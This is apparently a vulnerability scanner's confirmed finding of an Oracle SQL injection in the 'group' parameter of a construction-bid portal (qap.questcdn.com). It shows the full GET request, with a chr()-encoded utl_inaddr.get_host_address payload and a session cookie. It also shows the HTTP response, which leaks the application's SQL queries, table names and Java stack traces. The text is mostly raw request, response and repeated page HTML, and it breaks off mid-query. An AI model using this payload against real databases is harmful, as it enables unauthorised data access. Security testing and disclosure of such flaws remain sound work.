href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:04:24.471 [ 1] (TP-Processor1681) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) ORDER BY j.bid_date asc ORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) |
| provider | GET | 453856 |
| sortType | GET | 0 |
| jobNo | GET | 1464405 |
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=324403&group=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))&provider=453856&sortType=0&jobNo=1464405 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:18 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:18 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 25791
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1464405&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1464405&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1464405&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1464405&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:04:45.706 [ 1] (TP-Processor1822) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = (utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))) GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASCORA-06512: at "SYS.UTL_INADDR", line 19ORA-06512: at "SYS.UTL_INADDR", line 40ORA-06512: at line 1 at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">City of Chelsea, Iowa: Sanitary Sewer Improvements Project<span><span class="prj_num">(#1464405)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Tama - Chelsea, IA</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 02:00:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></..
Date: Tue, 01 Mar 2011 20:04:18 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:18 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 25791
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1464405&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1464405&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1464405&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1464405&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%28utl_inaddr.get_host_address%28%28select+chr%2895%29%7C%7Cchr%2833%29%7C%7Cchr%2864%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28105%29%7C%7Cchr%28108%29%7C%7Cchr%28101%29%7C%7Cchr%28109%29%7C%7Cchr%28109%29%7C%7Cchr%2897%29+from+DUAL%29%29%29&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:04:45.706 [ 1] (TP-Processor1822) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-29257: host _!@3dilemma unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR 